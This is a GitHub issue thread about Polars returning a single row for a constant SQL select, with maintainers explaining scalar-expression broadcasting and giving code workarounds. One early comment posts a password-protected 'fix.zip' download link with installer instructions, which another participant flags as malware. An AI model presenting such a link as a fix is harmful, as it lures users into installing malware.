### ISSUE TITLE
SELECT 0 from table_name return 1 line instead of expected number_of_lines(table_name)

### ISSUE THREAD

**Issue by AlexeyDmitriev** [pola-rs/polars#18404]
### Checks

- [X] I have checked that this issue has not already been reported.
- [X] I have confirmed this bug exists on the [latest version](https://pypi.org/project/polars/) of Polars.

### Reproducible example

```python
import polars as pl
L = pl.DataFrame({'a': [1,2]})
pl.sql('SELECT 0 FROM L').collect()
```

### Log output

```shell
shape: (1, 1)
literal
i32
0
```

### Issue description

So, when you select constant from a table you get the value 1 times.

### Expected behavior

When you do the same in classical DBMS such as postgresql you get the number of lines equal to the number of lines. 
That was what I expected as well.

I understand the polars may have expected different semantics, but I haven't find relevant place in the docs which would mention this case. 

### Installed versions

<details>

```
--------Version info---------
Polars:               1.5.0
Index type:           UInt32
Platform:             Linux-5.15.0-113-generic-x86_64-with-glibc2.31
Python:               3.11.7 (main, Apr 20 2024, 11:23:46) [GCC 13.2.0]

----Optional dependencies----
adbc_driver_manager:  <not installed>
cloudpickle:          2.2.0
connectorx:           <not installed>
deltalake:            <not installed>
fastexcel:            <not installed>
fsspec:               2024.6.1
gevent:               <not installed>
great_tables:         <not installed>
hvplot:               <not installed>
matplotlib:           3.7.1
nest_asyncio:         1.6.0
numpy:                1.23.4
openpyxl:             3.1.2
pandas:               2.0.0rc1
pyarrow:              16.0.0
pydantic:             2.6.0
pyiceberg:            <not installed>
sqlalchemy:           2.0.1
torch:                2.3.1+cu121
xlsx2csv:             <not installed>
xlsxwriter:           1.1.1
```

</details>

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AlexeyDmitriev** [comment]
The same applies to python API

**I** expected `L.select(pl.lit(0))` to return 2 lines, not 1 as it's returned.
But that's harder to compare with other DBMSes

**Comment by mcrumiller** [comment]
@ritchie46 @orlp can a mod delete/ban the malware link above?

@AlexeyDmitriev for the python API, 2 lines is intended I believe. See the discussion in #17107.

**Comment by AlexeyDmitriev** [comment]
Actually I saw that issue, but didn't quite get what is expected and what is not

**Comment by orlp** [comment]
In Polars (conceptually speaking) `pl.lit(0)` is a scalar expression, just like `pl.col.x.sum()` is. **Scalar expressions are returned as a new row by themselves if all columns are scalar, and are broadcasted to the other columns' lengths otherwise.**

So in these two examples `pl.lit(0)` and `pl.col.x.sum()` are returned as a new row:

```python
>>> df = pl.DataFrame({"x": []}, schema={"x": pl.Int32})
>>> df.select(s=pl.col.x.sum())
shape: (1, 1)
┌─────┐
│ s   │
│ --- │
│ i32 │
╞═════╡
│ 0   │
└─────┘
>>> df.select(pl.lit(0))
shape: (1, 1)
┌─────────┐
│ literal │
│ ---     │
│ i32     │
╞═════════╡
│ 0       │
└─────────┘
```

In these four examples the scalar values are broadcasted along with the other column, `x`, which in this case means the result has zero rows when `x` is empty:

```python
>>> df = pl.DataFrame({"x": [1, 2]}, schema={"x": pl.Int32})
>>> df.select(pl.col.x, pl.lit(0))
shape: (2, 2)
┌─────┬─────────┐
│ x   ┆ literal │
│ --- ┆ ---     │
│ i32 ┆ i32     │
╞═════╪═════════╡
│ 1   ┆ 0       │
│ 2   ┆ 0       │
└─────┴─────────┘
>>> df.select(pl.col.x, s=pl.col.x.sum())
shape: (2, 2)
┌─────┬─────┐
│ x   ┆ s   │
│ --- ┆ --- │
│ i32 ┆ i32 │
╞═════╪═════╡
│ 1   ┆ 3   │
│ 2   ┆ 3   │
└─────┴─────┘

>>> df = pl.DataFrame({"x": []}, schema={"x": pl.Int32})
>>> df.select(pl.col.x, pl.lit(0))
shape: (0, 2)
┌─────┬─────────┐
│ x   ┆ literal │
│ --- ┆ ---     │
│ i32 ┆ i32     │
╞═════╪═════════╡
└─────┴─────────┘
>>> df.select(pl.col.x, s=pl.col.x.sum())
shape: (0, 2)
┌─────┬─────┐
│ x   ┆ s   │
│ --- ┆ --- │
│ i32 ┆ i32 │
╞═════╪═════╡
└─────┴─────┘
```

This is why Polars has different behavior when you use `with_columns`.

As for the original issue, I don't know exactly how to match SQL's behavior here without a lot of work on our end...

**Comment by mcrumiller** [comment]
Thanks for the clarification @orlp, makes perfect sense.

**Comment by AlexeyDmitriev** [comment]
@orlp thanks for explanation, I can see now that this behaviour make sense (in particular you allow selecting aggregates and non-aggregates with simpler syntax then in classic sql as in your `df.select(pl.col.x, s=pl.col.x.sum())` example) 

Personally, I'd find more intuitive if there were to separate functions to select something for each line of the df (accept both, always broadcasted) and select an expression (accepts only scalars, doesn't)

* This way it's easier to understand the shape of what is returned when you read the code (even if you don't know the specific things user passed)
```
def f(expr):
    ...
    some_df.select(expr) # you know this is always the same shape as some_df, even if user passed literal
    ...
```
* You can always remove unnecessary column safely, e.g. `df.select(x=x, y=y).select('y')` is the same as `df.select(y=y)`

But I guess, that wouldn't work with the semantics of functions like `Expr.top_k` (because it's neither of my options)
 
Anyway, it would be good if this was explained in some obvious place in the docs, because when I tried to see explanation I failed.

Also, is it possible to create expression that means "0 distributed for each row even if nothing else is selected"?

> As for the original issue, I don't know exactly how to match SQL's behavior here without a lot of work on our end...
For me personally I only care for python API and showed sql behaviour only because with sql there's a system to compare to

BTW the fact that pl.lit is scalar also does something strange with joins

**Comment by mcrumiller** [comment]
> BTW the fact that pl.lit is scalar also does something strange with joins

@AlexeyDmitriev you mean this? #9603

**Comment by AlexeyDmitriev** [comment]
> @AlexeyDmitriev you mean this? #9603

I added somewhat simpler example there.

**Comment by orlp** [comment]
> Also, is it possible to create expression that means "0 distributed for each row even if nothing else is selected"?

Yes, but it's a bit ugly. You'll have to select a column to broadcast with, then drop that column after the broadcast:

```python
>>> df = pl.DataFrame({"x": [1, 2, 3]})
>>> df.select(pl.first(), pl.lit(0)).drop(pl.first())
shape: (3, 1)
┌─────────┐
│ literal │
│ ---     │
│ i32     │
╞═════════╡
│ 0       │
│ 0       │
│ 0       │
└─────────┘
```
